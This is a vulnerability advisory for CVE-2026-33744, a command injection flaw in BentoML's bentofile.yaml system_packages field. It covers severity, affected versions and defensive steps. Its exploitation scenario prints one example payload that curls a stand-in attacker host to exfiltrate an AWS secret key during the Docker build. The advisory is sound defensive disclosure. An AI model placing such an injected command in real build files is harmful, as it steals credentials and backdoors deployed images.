AI Threat Alert

CVE-2026-33744: BentoML: command injection in bentofile.yaml containerize

GHSA-jfjg-vc52-wqvf HIGH CISA: ATTEND
Published March 27, 2026
CISO Take

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

What is the risk?

High risk for organizations with collaborative or automated MLOps pipelines where bentofile.yaml originates from shared repositories, model hubs, or external contributors. Exploitation is trivial — no ML expertise required, just knowledge of shell metacharacters. The local attack vector limits opportunistic internet exposure, but CI/CD systems routinely pull and build from external sources, effectively elevating this to a remote-exploitable scenario in practice. Build-time compromise is particularly dangerous because artifacts (container images) propagate downstream before detection.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
bentoml pip <= 1.4.36 1.4.37
8.6K OpenSSF 6.5 23 dependents Pushed 7d ago 55% patched ~11d to patch Full package profile →

Do you use bentoml? You're affected.

Severity & Risk

CVSS 3.1
7.8 / 10
EPSS
0.0%
chance of exploitation in 30 days
Higher than 1% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Local
AC Low
PR None
UI Required
S Unchanged
C High
I High
A High

What should I do?

5 steps

  1. PATCH

    Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.

  2. AUDIT

    Review all bentofile.yaml files in your repositories for suspicious entries in system_packages — values containing semicolons, ampersands, pipes, backticks, or $() are red flags.

  3. GATE

    Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in system_packages.

  4. ISOLATE

    Run bentoml containerize in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts).

  5. DETECT

    Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework AML.T0010.001 AML.T0010.004 AML.T0011 AML.T0050 AML.T0079

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - Information security measures for AI systems A.8.4 - AI system third-party and supply chain
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place for AI supply chain risk management MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-33744?

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

Is CVE-2026-33744 actively exploited?

No confirmed active exploitation of CVE-2026-33744 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33744?

1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents. 2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `system_packages` — values containing semicolons, ampersands, pipes, backticks, or `$()` are red flags. 3. GATE: Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in `system_packages`. 4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). 5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

What systems are affected by CVE-2026-33744?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps build pipelines, container registries, training pipelines.

What is the CVSS score for CVE-2026-33744?

CVE-2026-33744 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.01%.

Technical Details

NVD Description

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.

Exploitation Scenario

A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.

Weaknesses (CWE)

CWE-94 Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

References

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026

Related Vulnerabilities

CRITICAL CVE-2025-54381 9.9

BentoML: unauthenticated SSRF via file upload URLs

Same package: bentoml
CRITICAL CVE-2025-27520 9.8

BentoML: unauthenticated RCE via insecure deserialization

Same package: bentoml
CRITICAL CVE-2025-32375 9.8

BentoML: RCE via insecure deserialization in runner

Same package: bentoml
CRITICAL CVE-2024-9070 9.8

BentoML: unauthenticated RCE via runner deserialization

Same package: bentoml
HIGH CVE-2026-35044 8.8

BentoML: malicious bento archive RCE via Jinja2 SSTI

Same package: bentoml
Back to Threat Feed